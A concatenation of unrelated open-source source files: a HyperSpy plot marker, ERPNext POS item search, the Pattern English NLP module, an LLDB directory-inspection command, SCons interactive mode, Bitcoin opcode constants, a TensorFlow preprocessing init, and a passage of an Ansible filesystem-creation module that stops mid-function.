"""Vertical line marker that can be added to the signal figure
Parameters
----------
x : array or float
The position of the line. If float, the marker is fixed.
If array, the marker will be updated when navigating. The array should
have the same dimensions in the navigation axes.
kwargs :
Keywords argument of axvline valid properties (i.e. recognized by
mpl.plot).
Example
-------
>>> s = hs.signals.Signal1D(np.random.random([10, 100]))
>>> m = hs.plot.markers.vertical_line(x=range(10), color='green')
>>> s.add_marker(m)
Adding a marker permanently to a signal
>>> s = hs.signals.Signal1D(np.random.random((100, 100)))
>>> m = hs.plot.markers.vertical_line(x=30)
>>> s.add_marker(m, permanent=True)
"""
def __init__(self, x, **kwargs):
MarkerBase.__init__(self)
lp = {'linewidth': 1, 'color': 'black'}
self.marker_properties = lp
self.set_data(x1=x)
self.set_marker_properties(**kwargs)
self.name = 'vertical_line'
def __repr__(self):
string = "<marker.{}, {} (x={},color={})>".format(
self.__class__.__name__,
self.name,
self.get_data_position('x1'),
self.marker_properties['color'],
self.get_data_position('size'),
)
return(string)
def update(self):
if self.auto_update is False:
return
self.marker.set_xdata(self.get_data_position('x1'))
def _plot_marker(self):
self.marker = self.ax.axvline(self.get_data_position('x1'),
**self.marker_properties)
| gpl-3.0 |
sagar30051991/ozsmart-erp | erpnext/accounts/doctype/sales_invoice/pos.py | 11 | 2008 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
@frappe.whitelist()
def get_items(price_list, sales_or_purchase, item=None):
condition = ""
order_by = ""
args = {"price_list": price_list}
if sales_or_purchase == "Sales":
condition = "i.is_sales_item=1"
else:
condition = "i.is_purchase_item=1"
if item:
# search serial no
item_code = frappe.db.sql("""select name as serial_no, item_code
from `tabSerial No` where name=%s""", (item), as_dict=1)
if item_code:
item_code[0]["name"] = item_code[0]["item_code"]
return item_code
# search barcode
item_code = frappe.db.sql("""select name, item_code from `tabItem`
where barcode=%s""",
(item), as_dict=1)
if item_code:
item_code[0]["barcode"] = item
return item_code
condition += " and ((CONCAT(i.name, i.item_name) like %(name)s) or (i.variant_of like %(name)s) or (i.item_group like %(name)s))"
order_by = """if(locate(%(_name)s, i.name), locate(%(_name)s, i.name), 99999),
if(locate(%(_name)s, i.item_name), locate(%(_name)s, i.item_name), 99999),
if(locate(%(_name)s, i.variant_of), locate(%(_name)s, i.variant_of), 99999),
if(locate(%(_name)s, i.item_group), locate(%(_name)s, i.item_group), 99999),"""
args["name"] = "%%%s%%" % frappe.db.escape(item)
args["_name"] = item.replace("%", "")
# locate function is used to sort by closest match from the beginning of the value
return frappe.db.sql("""select i.name, i.item_name, i.image,
item_det.price_list_rate, item_det.currency
from `tabItem` i LEFT JOIN
(select item_code, price_list_rate, currency from
`tabItem Price` where price_list=%(price_list)s) item_det
ON
(item_det.item_code=i.name or item_det.item_code=i.variant_of)
where
i.has_variants = 0 and
{condition}
order by
{order_by}
i.name
limit 24""".format(condition=condition, order_by=order_by), args, as_dict=1)
| agpl-3.0 |
elkingtonmcb/pattern | pattern/text/en/__init__.py | 21 | 7122 | #### PATTERN | EN ##################################################################################
# -*- coding: utf-8 -*-
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# English linguistical tools using fast regular expressions.
import os
import sys
try:
MODULE = os.path.dirname(os.path.realpath(__file__))
except:
MODULE = ""
sys.path.insert(0, os.path.join(MODULE, "..", "..", "..", ".."))
# Import parser base classes.
from pattern.text import (
Lexicon, Model, Morphology, Context, Parser as _Parser, ngrams, pprint, commandline,
PUNCTUATION
)
# Import parser universal tagset.
from pattern.text import (
penntreebank2universal,
PTB, PENN, UNIVERSAL,
NOUN, VERB, ADJ, ADV, PRON, DET, PREP, ADP, NUM, CONJ, INTJ, PRT, PUNC, X
)
# Import parse tree base classes.
from pattern.text.tree import (
Tree, Text, Sentence, Slice, Chunk, PNPChunk, Chink, Word, table,
SLASH, WORD, POS, CHUNK, PNP, REL, ANCHOR, LEMMA, AND, OR
)
# Import sentiment analysis base classes.
from pattern.text import (
Sentiment as _Sentiment, NOUN, VERB, ADJECTIVE, ADVERB
)
# Import spelling base class.
from pattern.text import (
Spelling
)
# Import verb tenses.
from pattern.text import (
INFINITIVE, PRESENT, PAST, FUTURE,
FIRST, SECOND, THIRD,
SINGULAR, PLURAL, SG, PL,
PROGRESSIVE,
PARTICIPLE
)
# Import inflection functions.
from pattern.text.en.inflect import (
article, referenced, DEFINITE, INDEFINITE,
pluralize, singularize, NOUN, VERB, ADJECTIVE,
grade, comparative, superlative, COMPARATIVE, SUPERLATIVE,
verbs, conjugate, lemma, lexeme, tenses,
predicative, attributive
)
# Import quantification functions.
from pattern.text.en.inflect_quantify import (
number, numerals, quantify, reflect
)
# Import mood & modality functions.
from pattern.text.en.modality import (
mood, INDICATIVE, IMPERATIVE, CONDITIONAL, SUBJUNCTIVE,
modality, uncertain, EPISTEMIC,
negated
)
# Import all submodules.
from pattern.text.en import inflect
from pattern.text.en import wordnet
from pattern.text.en import wordlist
sys.path.pop(0)
#--- ENGLISH PARSER --------------------------------------------------------------------------------
def find_lemmata(tokens):
""" Annotates the tokens with lemmata for plural nouns and conjugated verbs,
where each token is a [word, part-of-speech] list.
"""
for token in tokens:
word, pos, lemma = token[0], token[1], token[0]
# cats => cat
if pos == "NNS":
lemma = singularize(word)
# sat => sit
if pos.startswith(("VB", "MD")):
lemma = conjugate(word, INFINITIVE) or word
token.append(lemma.lower())
return tokens
class Parser(_Parser):
def find_lemmata(self, tokens, **kwargs):
return find_lemmata(tokens)
def find_tags(self, tokens, **kwargs):
if kwargs.get("tagset") in (PENN, None):
kwargs.setdefault("map", lambda token, tag: (token, tag))
if kwargs.get("tagset") == UNIVERSAL:
kwargs.setdefault("map", lambda token, tag: penntreebank2universal(token, tag))
return _Parser.find_tags(self, tokens, **kwargs)
class Sentiment(_Sentiment):
def load(self, path=None):
_Sentiment.load(self, path)
# Map "terrible" to adverb "terribly" (+1% accuracy)
if not path:
for w, pos in dict.items(self):
if "JJ" in pos:
if w.endswith("y"):
w = w[:-1] + "i"
if w.endswith("le"):
w = w[:-2]
p, s, i = pos["JJ"]
self.annotate(w + "ly", "RB", p, s, i)
parser = Parser(
lexicon = os.path.join(MODULE, "en-lexicon.txt"), # A dict of known words => most frequent tag.
frequency = os.path.join(MODULE, "en-frequency.txt"), # A dict of word frequency.
model = os.path.join(MODULE, "en-model.slp"), # A SLP classifier trained on WSJ (01-07).
morphology = os.path.join(MODULE, "en-morphology.txt"), # A set of suffix rules (e.g., -ly = adverb).
context = os.path.join(MODULE, "en-context.txt"), # A set of contextual rules.
entities = os.path.join(MODULE, "en-entities.txt"), # A dict of named entities: John = NNP-PERS.
default = ("NN", "NNP", "CD"),
language = "en"
)
lexicon = parser.lexicon # Expose lexicon.
sentiment = Sentiment(
path = os.path.join(MODULE, "en-sentiment.xml"),
synset = "wordnet_id",
negations = ("no", "not", "n't", "never"),
modifiers = ("RB",),
modifier = lambda w: w.endswith("ly"),
tokenizer = parser.find_tokens,
language = "en"
)
spelling = Spelling(
path = os.path.join(MODULE, "en-spelling.txt")
)
def tokenize(s, *args, **kwargs):
""" Returns a list of sentences, where punctuation marks have been split from words.
"""
return parser.find_tokens(s, *args, **kwargs)
def parse(s, *args, **kwargs):
""" Returns a tagged Unicode string.
"""
return parser.parse(s, *args, **kwargs)
def parsetree(s, *args, **kwargs):
""" Returns a parsed Text from the given string.
"""
return Text(parse(s, *args, **kwargs))
def tree(s, token=[WORD, POS, CHUNK, PNP, REL, LEMMA]):
""" Returns a parsed Text from the given parsed string.
"""
return Text(s, token)
def tag(s, tokenize=True, encoding="utf-8", **kwargs):
""" Returns a list of (token, tag)-tuples from the given string.
"""
tags = []
for sentence in parse(s, tokenize, True, False, False, False, encoding, **kwargs).split():
for token in sentence:
tags.append((token[0], token[1]))
return tags
def keywords(s, top=10, **kwargs):
""" Returns a sorted list of keywords in the given string.
"""
return parser.find_keywords(s, **dict({
"frequency": parser.frequency,
"top": top,
"pos": ("NN",),
"ignore": ("rt",)}, **kwargs))
def suggest(w):
""" Returns a list of (word, confidence)-tuples of spelling corrections.
"""
return spelling.suggest(w)
def polarity(s, **kwargs):
""" Returns the sentence polarity (positive/negative) between -1.0 and 1.0.
"""
return sentiment(s, **kwargs)[0]
def subjectivity(s, **kwargs):
""" Returns the sentence subjectivity (objective/subjective) between 0.0 and 1.0.
"""
return sentiment(s, **kwargs)[1]
def positive(s, threshold=0.1, **kwargs):
""" Returns True if the given sentence has a positive sentiment (polarity >= threshold).
"""
return polarity(s, **kwargs) >= threshold
split = tree # Backwards compatibility.
#---------------------------------------------------------------------------------------------------
# python -m pattern.en xml -s "The cat sat on the mat." -OTCL
if __name__ == "__main__":
commandline(parse) | bsd-3-clause |
DerekSelander/LLDB | lldb_commands/ddp.py | 1 | 5995 | # MIT License
# Copyright (c) 2020 Derik Ramirez
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import lldb
import os
import shlex
import optparse
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand(
'command script add -f ddp.handle_command ddp')
def handle_command(debugger, command, result, internal_dict):
'''
Displays the Document directories for the current app.
This includes the DataDirectory and the Shared directories
the app has access through from the shared groups.
'''
command_args = shlex.split(command, posix=True)
parser = generateOptionParser()
try:
(options, args) = parser.parse_args(command_args)
except:
result.SetError(parser.usage)
return
if len(command_args) == 0 or command_args == ['-h']:
parser.print_help()
if options.data_directory or options.all_data_directories:
result.AppendMessage("Data Dir:\n{}".format(getDocumentDirectory()))
if options.all_data_directories:
groups = getApplicationGroups()
for i in groups:
if i == None:
continue
result.AppendMessage("group: {}\ndir: {}".format(i,getSharedDirForGroup(i)))
if options.shared_directory:
result.AppendMessage("Shared Dir for group: {}\n{}".format(options.shared_directory,getSharedDirForGroup(options.shared_directory)))
if options.application_groups:
result.AppendMessage("Application Groups:\n{}".format(getApplicationGroups()))
def executeCommand(command):
debugger = lldb.debugger
process = debugger.GetSelectedTarget().GetProcess()
frame = process.GetSelectedThread().GetSelectedFrame()
target = debugger.GetSelectedTarget()
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(False);
expr_options.SetFetchDynamicValue(lldb.eDynamicCanRunTarget);
expr_options.SetTimeoutInMicroSeconds (30*1000*1000) # 30 second timeout
expr_options.SetTryAllThreads (True)
expr_options.SetUnwindOnError(False)
expr_options.SetGenerateDebugInfo(True)
expr_options.SetLanguage (lldb.eLanguageTypeObjC)
expr_options.SetCoerceResultToId(True)
return frame.EvaluateExpression(command, expr_options)
def getDocumentDirectory():
command_script = r'''
@import ObjectiveC;
@import Foundation;
[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0].absoluteString;
'''
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return str(d_sbval.error)
return d_sbval.description
def getSharedDirForGroup(group_name):
command_script = r'''
@import ObjectiveC;
@import Foundation;
[[NSFileManager defaultManager] containerURLForSecurityApplicationGroupIdentifier:@"'''
command_script += group_name + '"]'
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return str(d_sbval.error)
return d_sbval.description
def getApplicationGroups():
command_script = r'''
@import ObjectiveC;
@import Foundation;
// Declare the private SecTask functions
void* (SecTaskCopyValueForEntitlement)(void* task, CFStringRef entitlement, CFErrorRef _Nullable *error);
void* (SecTaskCreateFromSelf)(CFAllocatorRef allocator);
CFErrorRef err = nil;
NSArray* groups = (NSArray *)SecTaskCopyValueForEntitlement(SecTaskCreateFromSelf(NULL), CFSTR("com.apple.security.application-groups"), &err);
groups;
'''
d_sbval = executeCommand(command_script)
if d_sbval.error.fail:
return []
groups = []
for i in range(d_sbval.GetNumChildren()):
groups.append(d_sbval.GetChildAtIndex(i).description)
return groups
def generateOptionParser():
usage = "usage: %prog [options]"
parser = optparse.OptionParser(usage=usage, prog="ddp")
parser.add_option("-d", "--data_directory",
action="store_true",
default=False,
dest="data_directory",
help="Displays the Data Directory for the current app bundle.")
parser.add_option("-a", "--all_data_directories",
action="store_true",
default=False,
dest="all_data_directories",
help="Displays the Data Directories for the current app bundle.")
parser.add_option("-s", "--shared_directory",
action="store",
default=None,
dest="shared_directory",
help="Displays the Shared data directories the current app bundle has from its shared groups.")
parser.add_option("-g", "--application_groups",
action="store_true",
default=False,
dest="application_groups",
help="Displays application_groups of the current app bundle.")
return parser
| gpl-2.0 |
bpsinc-native/src_third_party_scons-2.0.1 | engine/SCons/Script/Interactive.py | 61 | 14083 | #
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Script/Interactive.py 5134 2010/08/16 23:02:40 bdeegan"
__doc__ = """
SCons interactive mode
"""
# TODO:
#
# This has the potential to grow into something with a really big life
# of its own, which might or might not be a good thing. Nevertheless,
# here are some enhancements that will probably be requested some day
# and are worth keeping in mind (assuming this takes off):
#
# - A command to re-read / re-load the SConscript files. This may
# involve allowing people to specify command-line options (e.g. -f,
# -I, --no-site-dir) that affect how the SConscript files are read.
#
# - Additional command-line options on the "build" command.
#
# Of the supported options that seemed to make sense (after a quick
# pass through the list), the ones that seemed likely enough to be
# used are listed in the man page and have explicit test scripts.
#
# These had code changed in Script/Main.py to support them, but didn't
# seem likely to be used regularly, so had no test scripts added:
#
# build --diskcheck=*
# build --implicit-cache=*
# build --implicit-deps-changed=*
# build --implicit-deps-unchanged=*
#
# These look like they should "just work" with no changes to the
# existing code, but like those above, look unlikely to be used and
# therefore had no test scripts added:
#
# build --random
#
# These I'm not sure about. They might be useful for individual
# "build" commands, and may even work, but they seem unlikely enough
# that we'll wait until they're requested before spending any time on
# writing test scripts for them, or investigating whether they work.
#
# build -q [??? is there a useful analog to the exit status?]
# build --duplicate=
# build --profile=
# build --max-drift=
# build --warn=*
# build --Y
#
# - Most of the SCons command-line options that the "build" command
# supports should be settable as default options that apply to all
# subsequent "build" commands. Maybe a "set {option}" command that
# maps to "SetOption('{option}')".
#
# - Need something in the 'help' command that prints the -h output.
#
# - A command to run the configure subsystem separately (must see how
# this interacts with the new automake model).
#
# - Command-line completion of target names; maybe even of SCons options?
# Completion is something that's supported by the Python cmd module,
# so this should be doable without too much trouble.
#
import cmd
import copy
import os
import re
import shlex
import sys
try:
import readline
except ImportError:
pass
class SConsInteractiveCmd(cmd.Cmd):
"""\
build [TARGETS] Build the specified TARGETS and their dependencies.
'b' is a synonym.
clean [TARGETS] Clean (remove) the specified TARGETS and their
dependencies. 'c' is a synonym.
exit Exit SCons interactive mode.
help [COMMAND] Prints help for the specified COMMAND. 'h' and
'?' are synonyms.
shell [COMMANDLINE] Execute COMMANDLINE in a subshell. 'sh' and '!'
are synonyms.
version Prints SCons version information.
"""
synonyms = {
'b' : 'build',
'c' : 'clean',
'h' : 'help',
'scons' : 'build',
'sh' : 'shell',
}
def __init__(self, **kw):
cmd.Cmd.__init__(self)
for key, val in kw.items():
setattr(self, key, val)
if sys.platform == 'win32':
self.shell_variable = 'COMSPEC'
else:
self.shell_variable = 'SHELL'
def default(self, argv):
print "*** Unknown command: %s" % argv[0]
def onecmd(self, line):
line = line.strip()
if not line:
print self.lastcmd
return self.emptyline()
self.lastcmd = line
if line[0] == '!':
line = 'shell ' + line[1:]
elif line[0] == '?':
line = 'help ' + line[1:]
if os.sep == '\\':
line = line.replace('\\', '\\\\')
argv = shlex.split(line)
argv[0] = self.synonyms.get(argv[0], argv[0])
if not argv[0]:
return self.default(line)
else:
try:
func = getattr(self, 'do_' + argv[0])
except AttributeError:
return self.default(argv)
return func(argv)
def do_build(self, argv):
"""\
build [TARGETS] Build the specified TARGETS and their
dependencies. 'b' is a synonym.
"""
import SCons.Node
import SCons.SConsign
import SCons.Script.Main
options = copy.deepcopy(self.options)
options, targets = self.parser.parse_args(argv[1:], values=options)
SCons.Script.COMMAND_LINE_TARGETS = targets
if targets:
SCons.Script.BUILD_TARGETS = targets
else:
# If the user didn't specify any targets on the command line,
# use the list of default targets.
SCons.Script.BUILD_TARGETS = SCons.Script._build_plus_default
nodes = SCons.Script.Main._build_targets(self.fs,
options,
targets,
self.target_top)
if not nodes:
return
# Call each of the Node's alter_targets() methods, which may
# provide additional targets that ended up as part of the build
# (the canonical example being a VariantDir() when we're building
# from a source directory) and which we therefore need their
# state cleared, too.
x = []
for n in nodes:
x.extend(n.alter_targets()[0])
nodes.extend(x)
# Clean up so that we can perform the next build correctly.
#
# We do this by walking over all the children of the targets,
# and clearing their state.
#
# We currently have to re-scan each node to find their
# children, because built nodes have already been partially
# cleared and don't remember their children. (In scons
# 0.96.1 and earlier, this wasn't the case, and we didn't
# have to re-scan the nodes.)
#
# Because we have to re-scan each node, we can't clear the
# nodes as we walk over them, because we may end up rescanning
# a cleared node as we scan a later node. Therefore, only
# store the list of nodes that need to be cleared as we walk
# the tree, and clear them in a separate pass.
#
# XXX: Someone more familiar with the inner workings of scons
# may be able to point out a more efficient way to do this.
SCons.Script.Main.progress_display("scons: Clearing cached node information ...")
seen_nodes = {}
def get_unseen_children(node, parent, seen_nodes=seen_nodes):
def is_unseen(node, seen_nodes=seen_nodes):
return node not in seen_nodes
return list(filter(is_unseen, node.children(scan=1)))
def add_to_seen_nodes(node, parent, seen_nodes=seen_nodes):
seen_nodes[node] = 1
# If this file is in a VariantDir and has a
# corresponding source file in the source tree, remember the
# node in the source tree, too. This is needed in
# particular to clear cached implicit dependencies on the
# source file, since the scanner will scan it if the
# VariantDir was created with duplicate=0.
try:
rfile_method = node.rfile
except AttributeError:
return
else:
rfile = rfile_method()
if rfile != node:
seen_nodes[rfile] = 1
for node in nodes:
walker = SCons.Node.Walker(node,
kids_func=get_unseen_children,
eval_func=add_to_seen_nodes)
n = walker.get_next()
while n:
n = walker.get_next()
for node in seen_nodes.keys():
# Call node.clear() to clear most of the state
node.clear()
# node.clear() doesn't reset node.state, so call
# node.set_state() to reset it manually
node.set_state(SCons.Node.no_state)
node.implicit = None
# Debug: Uncomment to verify that all Taskmaster reference
# counts have been reset to zero.
#if node.ref_count != 0:
# from SCons.Debug import Trace
# Trace('node %s, ref_count %s !!!\n' % (node, node.ref_count))
SCons.SConsign.Reset()
SCons.Script.Main.progress_display("scons: done clearing node information.")
def do_clean(self, argv):
"""\
clean [TARGETS] Clean (remove) the specified TARGETS
and their dependencies. 'c' is a synonym.
"""
return self.do_build(['build', '--clean'] + argv[1:])
def do_EOF(self, argv):
print
self.do_exit(argv)
def _do_one_help(self, arg):
try:
# If help_<arg>() exists, then call it.
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
func = getattr(self, 'do_' + arg)
except AttributeError:
doc = None
else:
doc = self._doc_to_help(func)
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
else:
doc = self.strip_initial_spaces(func())
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
def _doc_to_help(self, obj):
doc = obj.__doc__
if doc is None:
return ''
return self._strip_initial_spaces(doc)
def _strip_initial_spaces(self, s):
#lines = s.split('\n')
lines = s.split('\n')
spaces = re.match(' *', lines[0]).group(0)
#def strip_spaces(l):
# if l.startswith(spaces):
# l = l[len(spaces):]
# return l
#return '\n'.join([ strip_spaces(l) for l in lines ])
def strip_spaces(l, spaces=spaces):
if l[:len(spaces)] == spaces:
l = l[len(spaces):]
return l
lines = list(map(strip_spaces, lines))
return '\n'.join(lines)
def do_exit(self, argv):
"""\
exit Exit SCons interactive mode.
"""
sys.exit(0)
def do_help(self, argv):
"""\
help [COMMAND] Prints help for the specified COMMAND. 'h'
and '?' are synonyms.
"""
if argv[1:]:
for arg in argv[1:]:
if self._do_one_help(arg):
break
else:
# If bare 'help' is called, print this class's doc
# string (if it has one).
doc = self._doc_to_help(self.__class__)
if doc:
sys.stdout.write(doc + '\n')
sys.stdout.flush()
def do_shell(self, argv):
"""\
shell [COMMANDLINE] Execute COMMANDLINE in a subshell. 'sh' and
'!' are synonyms.
"""
import subprocess
argv = argv[1:]
if not argv:
argv = os.environ[self.shell_variable]
try:
# Per "[Python-Dev] subprocess insufficiently platform-independent?"
# http://mail.python.org/pipermail/python-dev/2008-August/081979.html "+
# Doing the right thing with an argument list currently
# requires different shell= values on Windows and Linux.
p = subprocess.Popen(argv, shell=(sys.platform=='win32'))
except EnvironmentError, e:
sys.stderr.write('scons: %s: %s\n' % (argv[0], e.strerror))
else:
p.wait()
def do_version(self, argv):
"""\
version Prints SCons version information.
"""
sys.stdout.write(self.parser.version + '\n')
def interact(fs, parser, options, targets, target_top):
c = SConsInteractiveCmd(prompt = 'scons>>> ',
fs = fs,
parser = parser,
options = options,
targets = targets,
target_top = target_top)
c.cmdloop()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit |
kvikshaug/pitcoin | pitcoin/script_opcodes.py | 1 | 1964 | # push value
OP_0 = 0x00
OP_FALSE = OP_0
OP_PUSHDATA1 = 0x4c
OP_PUSHDATA2 = 0x4d
OP_PUSHDATA4 = 0x4e
OP_1NEGATE = 0x4f
OP_RESERVED = 0x50
OP_1 = 0x51
OP_TRUE = OP_1
OP_2 = 0x52
OP_3 = 0x53
OP_4 = 0x54
OP_5 = 0x55
OP_6 = 0x56
OP_7 = 0x57
OP_8 = 0x58
OP_9 = 0x59
OP_10 = 0x5a
OP_11 = 0x5b
OP_12 = 0x5c
OP_13 = 0x5d
OP_14 = 0x5e
OP_15 = 0x5f
OP_16 = 0x60
# control
OP_NOP = 0x61
OP_VER = 0x62
OP_IF = 0x63
OP_NOTIF = 0x64
OP_VERIF = 0x65
OP_VERNOTIF = 0x66
OP_ELSE = 0x67
OP_ENDIF = 0x68
OP_VERIFY = 0x69
OP_RETURN = 0x6a
# stack ops
OP_TOALTSTACK = 0x6b
OP_FROMALTSTACK = 0x6c
OP_2DROP = 0x6d
OP_2DUP = 0x6e
OP_3DUP = 0x6f
OP_2OVER = 0x70
OP_2ROT = 0x71
OP_2SWAP = 0x72
OP_IFDUP = 0x73
OP_DEPTH = 0x74
OP_DROP = 0x75
OP_DUP = 0x76
OP_NIP = 0x77
OP_OVER = 0x78
OP_PICK = 0x79
OP_ROLL = 0x7a
OP_ROT = 0x7b
OP_SWAP = 0x7c
OP_TUCK = 0x7d
# splice ops
OP_CAT = 0x7e
OP_SUBSTR = 0x7f
OP_LEFT = 0x80
OP_RIGHT = 0x81
OP_SIZE = 0x82
# bit logic
OP_INVERT = 0x83
OP_AND = 0x84
OP_OR = 0x85
OP_XOR = 0x86
OP_EQUAL = 0x87
OP_EQUALVERIFY = 0x88
OP_RESERVED1 = 0x89
OP_RESERVED2 = 0x8a
# numeric
OP_1ADD = 0x8b
OP_1SUB = 0x8c
OP_2MUL = 0x8d
OP_2DIV = 0x8e
OP_NEGATE = 0x8f
OP_ABS = 0x90
OP_NOT = 0x91
OP_0NOTEQUAL = 0x92
OP_ADD = 0x93
OP_SUB = 0x94
OP_MUL = 0x95
OP_DIV = 0x96
OP_MOD = 0x97
OP_LSHIFT = 0x98
OP_RSHIFT = 0x99
OP_BOOLAND = 0x9a
OP_BOOLOR = 0x9b
OP_NUMEQUAL = 0x9c
OP_NUMEQUALVERIFY = 0x9d
OP_NUMNOTEQUAL = 0x9e
OP_LESSTHAN = 0x9f
OP_GREATERTHAN = 0xa0
OP_LESSTHANOREQUAL = 0xa1
OP_GREATERTHANOREQUAL = 0xa2
OP_MIN = 0xa3
OP_MAX = 0xa4
OP_WITHIN = 0xa5
# crypto
OP_RIPEMD160 = 0xa6
OP_SHA1 = 0xa7
OP_SHA256 = 0xa8
OP_HASH160 = 0xa9
OP_HASH256 = 0xaa
OP_CODESEPARATOR = 0xab
OP_CHECKSIG = 0xac
OP_CHECKSIGVERIFY = 0xad
OP_CHECKMULTISIG = 0xae
OP_CHECKMULTISIGVERIFY = 0xaf
# expansion
OP_NOP1 = 0xb0
OP_NOP2 = 0xb1
OP_NOP3 = 0xb2
OP_NOP4 = 0xb3
OP_NOP5 = 0xb4
OP_NOP6 = 0xb5
OP_NOP7 = 0xb6
OP_NOP8 = 0xb7
OP_NOP9 = 0xb8
OP_NOP10 = 0xb9
OP_INVALIDOPCODE = 0xff
| bsd-3-clause |
gojira/tensorflow | tensorflow/contrib/learn/python/learn/preprocessing/__init__.py | 42 | 1263 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Preprocessing tools useful for building models (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.contrib.learn.python.learn.preprocessing.categorical import *
from tensorflow.contrib.learn.python.learn.preprocessing.text import *
# pylint: enable=wildcard-import
| apache-2.0 |
ravello/ansible-modules-extras | system/filesystem.py | 38 | 3422 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Alexander Bulimov <lazywolf0@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
author: Alexander Bulimov
module: filesystem
short_description: Makes file system on block device
description:
- This module creates file system.
version_added: "1.2"
options:
fstype:
description:
- File System type to be created.
required: true
dev:
description:
- Target block device.
required: true
force:
choices: [ "yes", "no" ]
default: "no"
description:
- If yes, allows to create new filesystem on devices that already has filesystem.
required: false
opts:
description:
- List of options to be passed to mkfs command.
notes:
- uses mkfs command
'''
EXAMPLES = '''
# Create a ext2 filesystem on /dev/sdb1.
- filesystem: fstype=ext2 dev=/dev/sdb1
# Create a ext4 filesystem on /dev/sdb1 and check disk blocks.
- filesystem: fstype=ext4 dev=/dev/sdb1 opts="-cc"
'''
def main():
module = AnsibleModule(
argument_spec = dict(
fstype=dict(required=True, aliases=['type']),
dev=dict(required=True, aliases=['device']),
opts=dict(),
force=dict(type='bool', default='no'),
),
supports_check_mode=True,
)
dev = module.params['dev']
fstype = module.params['fstype']
opts = module.params['opts']
force = module.boolean(module.params['force'])
changed = False
if not os.path.exists(dev):
module.fail_json(msg="Device %s not found."%dev)
cmd = module.get_bin_path('blkid', required=True)
rc,raw_fs,err = module.run_command("%s -c /dev/null -o value -s TYPE %s" % (cmd, dev))
fs = raw_fs.strip()
if fs == fstype:
module.exit_json(changed=False)
elif fs and not force:
module.fail_json(msg="'%s' is already used as %s, use force=yes to overwrite"%(dev,fs), rc=rc, err=err)
### create fs
if module.check_mode:
changed = True
else:
mkfs = module.get_bin_path('mkfs', required=True)
cmd = None
if fstype in ['ext2', 'ext3', 'ext4', 'ext4dev']:
force_flag="-F"
elif fstype in ['xfs', 'btrfs']:
force_flag="-f"
else:
force_flag=""
if opts is None:
cmd = "%s -t %s %s '%s'" % (mkfs, fstype, force_flag, dev)
else:
